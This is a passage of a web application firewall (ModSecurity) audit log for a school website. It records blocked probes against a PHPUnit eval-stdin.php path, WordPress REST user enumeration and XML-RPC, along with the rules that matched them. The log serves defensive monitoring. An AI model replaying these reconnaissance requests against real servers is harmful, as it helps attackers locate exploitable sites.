"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746820630206644 3059 (- - -) Stopwatch2: 1746820630206644 3059; combined=1366, p1=463, p2=872, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e67c854d-Z-- --e65c792b-A-- [10/May/2025:03:10:32 +0700] aB5hOFqQ1nOVx9fWpZSyHAAAAAk 103.236.140.4 60078 103.236.140.4 8181 --e65c792b-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.230.252.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.230.252.236 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --e65c792b-C-- --e65c792b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e65c792b-E-- --e65c792b-H-- Message: Access denied with code 403 (phase 2). String match " --01bd1b37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01bd1b37-E-- --01bd1b37-H-- Message: Access denied with code 403 (phase 2). String match " --04d90325-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04d90325-E-- --04d90325-H-- Message: Access denied with code 403 (phase 2). String match " --3d2bbb64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d2bbb64-H-- Message: Access denied with code 403 (phase 2). String match " --3836bd52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3836bd52-E-- --3836bd52-H-- Message: Access denied with code 403 (phase 2). String match " --70501903-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70501903-E-- --70501903-H-- Message: Access denied with code 403 (phase 2). String match " --6cc78f76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cc78f76-H-- Message: Access denied with code 403 (phase 2). String match " --efe2eb2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efe2eb2f-E-- --efe2eb2f-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --04b72b39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --04b72b39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746823034025080 5975 (- - -) Stopwatch2: 1746823034025080 5975; combined=4394, p1=571, p2=3592, p3=29, p4=32, p5=99, sr=74, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04b72b39-Z-- --3910a44c-A-- [10/May/2025:03:37:42 +0700] aB5nlhLuBiaF9R054QBR6gAAABA 103.236.140.4 60268 103.236.140.4 8181 --3910a44c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3910a44c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3910a44c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746823062557319 15382 (- - -) Stopwatch2: 1746823062557319 15382; combined=25349, p1=481, p2=829, p3=0, p4=0, p5=12034, sr=88, sw=0, l=0, gc=12005 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3910a44c-Z-- --9db85e30-A-- [10/May/2025:03:37:47 +0700] aB5nmxLuBiaF9R054QBR7AAAABI 103.236.140.4 60272 103.236.140.4 8181 --9db85e30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.4 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9db85e30-C-- demo.sayHello --9db85e30-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9db85e30-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746823067214043 5319 (- - -) Stopwatch2: 1746823067214043 5319; combined=3964, p1=516, p2=3239, p3=21, p4=23, p5=95, sr=77, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9db85e30-Z-- --bb9da319-A-- [10/May/2025:03:40:29 +0700] aB5oPRLuBiaF9R054QBR7gAAABU 103.236.140.4 60280 103.236.140.4 8181 --bb9da319-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb9da319-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb9da319-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746823229310689 3286 (- - -) Stopwatch2: 1746823229310689 3286; combined=1357, p1=488, p2=840, p3=0, p4=0, p5=29, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb9da319-Z-- --3c28ea14-A-- [10/May/2025:03:40:35 +0700] aB5oQxLuBiaF9R054QBR8AAAABc 103.236.140.4 60284 103.236.140.4 8181 --3c28ea14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.218 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3c28ea14-C-- demo.sayHello --3c28ea14-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c28ea14-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746823235122960 4003 (- - -) Stopwatch2: 1746823235122960 4003; combined=2730, p1=505, p2=2079, p3=17, p4=15, p5=65, sr=97, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c28ea14-Z-- --18de3d4d-A-- [10/May/2025:03:41:47 +0700] aB5oixLuBiaF9R054QBR8wAAAAQ 103.236.140.4 60304 103.236.140.4 8181 --18de3d4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --18de3d4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18de3d4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746823307718846 3098 (- - -) Stopwatch2: 1746823307718846 3098; combined=1316, p1=442, p2=845, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18de3d4d-Z-- --e456f715-A-- [10/May/2025:03:41:53 +0700] aB5okRLuBiaF9R054QBR9QAAAAY 103.236.140.4 60308 103.236.140.4 8181 --e456f715-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e456f715-C-- demo.sayHello --e456f715-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e456f715-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746823313524822 5171 (- - -) Stopwatch2: 1746823313524822 5171; combined=3992, p1=463, p2=3306, p3=27, p4=27, p5=98, sr=66, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e456f715-Z-- --d316816d-A-- [10/May/2025:03:59:58 +0700] aB5szquC4AqLGUOyzyX2aAAAAIw 103.236.140.4 33528 103.236.140.4 8181 --d316816d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d316816d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d316816d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746824398727824 3081 (- - -) Stopwatch2: 1746824398727824 3081; combined=1343, p1=449, p2=858, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d316816d-Z-- --7332fb44-A-- [10/May/2025:04:00:05 +0700] aB5s1auC4AqLGUOyzyX2aQAAAI0 103.236.140.4 33532 103.236.140.4 8181 --7332fb44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.167 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7332fb44-C-- demo.sayHello --7332fb44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7332fb44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746824405490483 6557 (- - -) Stopwatch2: 1746824405490483 6557; combined=4674, p1=548, p2=3829, p3=32, p4=35, p5=135, sr=72, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7332fb44-Z-- --09b58c5e-A-- [10/May/2025:04:16:40 +0700] aB5wuKuC4AqLGUOyzyX3IQAAAIU 103.236.140.4 35330 103.236.140.4 8181 --09b58c5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --09b58c5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09b58c5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825400269770 3369 (- - -) Stopwatch2: 1746825400269770 3369; combined=1447, p1=505, p2=908, p3=0, p4=0, p5=33, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09b58c5e-Z-- --f94a7e16-A-- [10/May/2025:04:16:46 +0700] aB5wvquC4AqLGUOyzyX3IwAAAIc 103.236.140.4 35334 103.236.140.4 8181 --f94a7e16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f94a7e16-C-- demo.sayHello --f94a7e16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f94a7e16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825406145765 5117 (- - -) Stopwatch2: 1746825406145765 5117; combined=4044, p1=496, p2=3345, p3=23, p4=28, p5=89, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f94a7e16-Z-- --130bd947-A-- [10/May/2025:04:17:23 +0700] aB5w46uC4AqLGUOyzyX3JAAAAIg 103.236.140.4 35346 103.236.140.4 8181 --130bd947-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --130bd947-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --130bd947-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825443821185 3600 (- - -) Stopwatch2: 1746825443821185 3600; combined=1590, p1=547, p2=1011, p3=0, p4=0, p5=32, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --130bd947-Z-- --01236b5e-A-- [10/May/2025:04:17:26 +0700] aB5w5quC4AqLGUOyzyX3JQAAAIk 103.236.140.4 35350 103.236.140.4 8181 --01236b5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --01236b5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01236b5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825446172480 2282 (- - -) Stopwatch2: 1746825446172480 2282; combined=1107, p1=374, p2=706, p3=0, p4=0, p5=27, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01236b5e-Z-- --0e21c174-A-- [10/May/2025:04:17:29 +0700] aB5w6auC4AqLGUOyzyX3JgAAAIo 103.236.140.4 35352 103.236.140.4 8181 --0e21c174-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0e21c174-C-- demo.sayHello --0e21c174-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e21c174-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825449515354 5430 (- - -) Stopwatch2: 1746825449515354 5430; combined=4126, p1=487, p2=3342, p3=30, p4=92, p5=101, sr=108, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e21c174-Z-- --f166185f-A-- [10/May/2025:04:17:31 +0700] aB5w69r9PbfRBMhzxmRU8QAAAEA 103.236.140.4 35358 103.236.140.4 8181 --f166185f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f166185f-C-- demo.sayHello --f166185f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f166185f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825451248323 5125 (- - -) Stopwatch2: 1746825451248323 5125; combined=3867, p1=490, p2=3167, p3=21, p4=23, p5=96, sr=67, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f166185f-Z-- --177e952d-A-- [10/May/2025:04:18:43 +0700] aB5xM9r9PbfRBMhzxmRU8gAAAEM 103.236.140.4 35362 103.236.140.4 8181 --177e952d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --177e952d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --177e952d-H-- Message: Access denied with code 403 